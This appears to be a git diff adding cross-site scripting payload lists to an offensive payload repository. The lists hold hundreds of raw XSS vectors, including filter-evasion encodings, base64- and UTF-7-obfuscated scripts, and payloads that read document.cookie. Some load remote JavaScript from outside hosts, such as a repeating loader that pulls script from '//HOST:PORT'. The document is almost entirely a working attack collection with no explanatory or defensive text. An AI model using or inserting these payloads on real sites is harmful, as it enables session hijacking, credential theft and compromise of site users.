|
<script>alert(1)<!–
|
||||||
|
<script src=//brutelogic.com.br/1.js>
|
||||||
|
<script src=//3334957647/1>
|
||||||
|
%3Cx onxxx=alert(1)
|
||||||
|
<%78 onxxx=1
|
||||||
|
<x %6Fnxxx=1
|
||||||
|
<x o%6Exxx=1
|
||||||
|
<x on%78xx=1
|
||||||
|
<x onxxx%3D1
|
||||||
|
<X onxxx=1
|
||||||
|
<x OnXxx=1
|
||||||
|
<X OnXxx=1
|
||||||
|
<x onxxx=1 onxxx=1
|
||||||
|
<x/onxxx=1
|
||||||
|
<x%09onxxx=1
|
||||||
|
<x%0Aonxxx=1
|
||||||
|
<x%0Conxxx=1
|
||||||
|
<x%0Donxxx=1
|
||||||
|
<x%2Fonxxx=1
|
||||||
|
<x 1='1'onxxx=1
|
||||||
|
<x 1="1"onxxx=1
|
||||||
|
<x </onxxx=1
|
||||||
|
<x 1=">" onxxx=1
|
||||||
|
<http://onxxx%3D1/
|
||||||
|
<x onxxx=alert(1) 1='
|
||||||
|
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
|
||||||
|
'onload=alert(1)><svg/1='
|
||||||
|
'>alert(1)</script><script/1='
|
||||||
|
*/alert(1)</script><script>/*
|
||||||
|
*/alert(1)">'onload="/*<svg/1='
|
||||||
|
`-alert(1)">'onload="`<svg/1='
|
||||||
|
*/</script>'>alert(1)/*<script/1='
|
||||||
|
<script>alert(1)</script>
|
||||||
|
<script src=javascript:alert(1)>
|
||||||
|
<iframe src=javascript:alert(1)>
|
||||||
|
<embed src=javascript:alert(1)>
|
||||||
|
<a href=javascript:alert(1)>click
|
||||||
|
<math><brute href=javascript:alert(1)>click
|
||||||
|
<form action=javascript:alert(1)><input type=submit>
|
||||||
|
<isindex action=javascript:alert(1) type=submit value=click>
|
||||||
|
<form><button formaction=javascript:alert(1)>click
|
||||||
|
<form><input formaction=javascript:alert(1) type=submit value=click>
|
||||||
|
<form><input formaction=javascript:alert(1) type=image value=click>
|
||||||
|
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
|
||||||
|
<isindex formaction=javascript:alert(1) type=submit value=click>
|
||||||
|
<object data=javascript:alert(1)>
|
||||||
|
<iframe srcdoc=<svg/onload=alert(1)>>
|
||||||
|
<svg><script xlink:href=data:,alert(1) />
|
||||||
|
<math><brute xlink:href=javascript:alert(1)>click
|
||||||
|
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
|
||||||
|
<html ontouchstart=alert(1)>
|
||||||
|
<html ontouchend=alert(1)>
|
||||||
|
<html ontouchmove=alert(1)>
|
||||||
|
<html ontouchcancel=alert(1)>
|
||||||
|
<body onorientationchange=alert(1)>
|
||||||
|
"><img src=1 onerror=alert(1)>.gif
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
|
||||||
|
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||||
|
<script src="data:,alert(1)//
|
||||||
|
"><script src=data:,alert(1)//
|
||||||
|
<script src="//brutelogic.com.br/1.js#
|
||||||
|
"><script src=//brutelogic.com.br/1.js#
|
||||||
|
<link rel=import href="data:text/html,<script>alert(1)</script>
|
||||||
|
"><link rel=import href=data:text/html,<script>alert(1)</script>
|
||||||
|
<base href=//0>
|
||||||
|
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
|
||||||
|
<body onload=alert(1)>
|
||||||
|
<body onpageshow=alert(1)>
|
||||||
|
<body onfocus=alert(1)>
|
||||||
|
<body onhashchange=alert(1)><a href=#x>click this!#x
|
||||||
|
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
|
||||||
|
<body onscroll=alert(1)><br><br><br><br>
|
||||||
|
<br><br><br><br><br><br><br><br><br><br>
|
||||||
|
<br><br><br><br><br><br><br><br><br><br>
|
||||||
|
<br><br><br><br><br><br><x id=x>#x
|
||||||
|
<body onresize=alert(1)>press F12!
|
||||||
|
<body onhelp=alert(1)>press F1! (MSIE)
|
||||||
|
<marquee onstart=alert(1)>
|
||||||
|
<marquee loop=1 width=0 onfinish=alert(1)>
|
||||||
|
<audio src onloadstart=alert(1)>
|
||||||
|
<video onloadstart=alert(1)><source>
|
||||||
|
<input autofocus onblur=alert(1)>
|
||||||
|
<keygen autofocus onfocus=alert(1)>
|
||||||
|
<form onsubmit=alert(1)><input type=submit>
|
||||||
|
<select onchange=alert(1)><option>1<option>2
|
||||||
|
<menu id=x contextmenu=x onshow=alert(1)>right click me!
|
After Width: | Height: | Size: 4.1 KiB |
@ -1,8 +0,0 @@
|
|||||||
XSS in flash application
|
|
||||||
```
|
|
||||||
\%22})))}catch(e){alert(document.domain);}//
|
|
||||||
|
|
||||||
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
|
|
||||||
|
|
||||||
"a")(({type:"ready"}));}catch(e){alert(1)}//
|
|
||||||
```
|
|
110
XSS injection/JHADDIX_XSS.txt
Normal file
110
XSS injection/JHADDIX_XSS.txt
Normal file
@ -0,0 +1,110 @@
|
|||||||
|
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
||||||
|
<<scr\0ipt/src=http://xss.com/xss.js></script
|
||||||
|
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
||||||
|
' onmouseover=alert(/Black.Spook/)
|
||||||
|
"><iframe%20src="http://google.com"%%203E
|
||||||
|
'<script>window.onload=function(){document.forms[0].message.value='1';}</script>
|
||||||
|
x”</title><img src%3dx onerror%3dalert(1)>
|
||||||
|
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
||||||
|
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
||||||
|
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
|
||||||
|
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
||||||
|
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||||
|
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
|
||||||
|
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||||
|
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
||||||
|
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
||||||
|
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
||||||
|
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
||||||
|
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
||||||
|
<script>alert(document.head.childNodes[3].text)</script>
|
||||||
|
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
||||||
|
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
||||||
|
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
|
||||||
|
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
|
||||||
|
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
||||||
|
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
||||||
|
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
||||||
|
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
||||||
|
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
||||||
|
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
||||||
|
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
||||||
|
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
||||||
|
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
||||||
|
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
||||||
|
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
|
||||||
|
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
||||||
|
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
||||||
|
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
||||||
|
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||||
|
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||||
|
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||||
|
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
||||||
|
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
|
||||||
|
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||||
|
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||||
|
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
|
||||||
|
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||||
|
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
||||||
|
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||||
|
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
|
||||||
|
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
||||||
|
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||||
|
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
||||||
|
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
||||||
|
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
||||||
|
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
||||||
|
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
||||||
|
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
||||||
|
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
|
||||||
|
<a href="javascript:\u0061le%72t(1)"><button>
|
||||||
|
<div onmouseover='alert(1)'>DIV</div>
|
||||||
|
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
||||||
|
<a href="jAvAsCrIpT:alert(1)">X</a>
|
||||||
|
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
||||||
|
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
||||||
|
<var onmouseover="prompt(1)">On Mouse Over</var>?
|
||||||
|
<a href=javascript:alert(document.cookie)>Click Here</a>
|
||||||
|
<img src="/" =_=" title="onerror='prompt(1)'">
|
||||||
|
<%<!--'%><script>alert(1);</script -->
|
||||||
|
<script src="data:text/javascript,alert(1)"></script>
|
||||||
|
<iframe/src \/\/onload = prompt(1)
|
||||||
|
<iframe/onreadystatechange=alert(1)
|
||||||
|
<svg/onload=alert(1)
|
||||||
|
<input value=<><iframe/src=javascript:confirm(1)
|
||||||
|
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
||||||
|
http://www.<script>alert(1)</script .com
|
||||||
|
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
||||||
|
<svg><script ?>alert(1)
|
||||||
|
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||||
|
<img src=`xx:xx`onerror=alert(1)>
|
||||||
|
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||||
|
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
||||||
|
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||||
|
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
||||||
|
<svg contentScriptType=text/vbs><script>MsgBox+1
|
||||||
|
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||||
|
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||||
|
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||||
|
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||||
|
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
||||||
|
<object data=javascript:\u0061le%72t(1)>
|
||||||
|
<script>+-+-1-+-+alert(1)</script>
|
||||||
|
<body/onload=<!-->
alert(1)>
|
||||||
|
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
||||||
|
<img src ?itworksonchrome?\/onerror = alert(1)???
|
||||||
|
<svg><script>//
confirm(1);</script </svg>
|
||||||
|
<svg><script onlypossibleinopera:-)> alert(1)
|
||||||
|
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||||
|
<script x> alert(1) </script 1=2
|
||||||
|
<div/onmouseover='alert(1)'> style="x:">
|
||||||
|
<--`<img/src=` onerror=alert(1)> --!>
|
||||||
|
<script/src=data:text/javascript,alert(1)></script> ?
|
||||||
|
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
||||||
|
"><img src=x onerror=window.open('https://www.google.com/');>
|
||||||
|
<form><button formaction=javascript:alert(1)>CLICKME
|
||||||
|
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||||
|
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
||||||
|
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||||
|
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
||||||
|
"><img src=x onerror=prompt(1);>
|
330
XSS injection/MarioXSSVectors.txt
Normal file
330
XSS injection/MarioXSSVectors.txt
Normal file
@ -0,0 +1,330 @@
|
|||||||
|
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))//["'`-->]]>]</div><div id="5"><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(5)',384,null,'rsa-dual-use')</script>//["'`-->]]>]</div><div id="6"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>//["'`-->]]>]</div><div id="7"><input onfocus=alert(7) autofocus>//["'`-->]]>]</div><div id="8"><input onblur=alert(8) autofocus><input autofocus>//["'`-->]]>]</div><div id="9"><a style="-o-link:'javascript:alert(9)';-o-link-source:current">X</a>//["'`-->]]>]</div><div id="10"><video poster=javascript:alert(10)//></video>//["'`-->]]>]</div><div id="11"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(11)"></g></svg>//["'`-->]]>]</div><div id="12"><body onscroll=alert(12)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>//["'`-->]]>]</div><div id="13"><x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>//["'`-->]]>]</div><div id="14"><input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>//["'`-->]]>]</div><div id="15"><script>({0:#0=alert/#0#/#0#(0)})</script>//["'`-->]]>]</div><div id="16">X<x style=`behavior:url(#default#time2)` onbegin=`alert(16)` >//["'`-->]]>]</div><div id="17"><?xml-stylesheet href="javascript:alert(17)"?><root/>//["'`-->]]>]</div><div id="18"><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>//["'`-->]]>]</div><div id="19"><meta charset="x-mac-farsi">¼script ¾alert(19)//¼/script ¾//["'`-->]]>]</div><div id="20"><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(20)}),x</script>//["'`-->]]>]</div><div id="21"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(21)')()</script>//["'`-->]]>]</div><div id="22"><input onblur=focus() autofocus><input>//["'`-->]]>]</div><div id="23"><form id=test onforminput=alert(23)><input></form><button form=test onformchange=alert(2)>X</button>//["'`-->]]>]</div><div id="24">1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(24)>`>//["'`-->]]>]</div><div id="25"><script src="#">{alert(25)}</script>;1//["'`-->]]>]</div><div id="26">+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);//["'`-->]]>]</div><div id="27"><style>p[foo=bar{}*{-o-link:'javascript:alert(27)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>//["'`-->]]>]</div>
|
||||||
|
<div id="28">1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(28)>>//["'`-->]]>]</div>
|
||||||
|
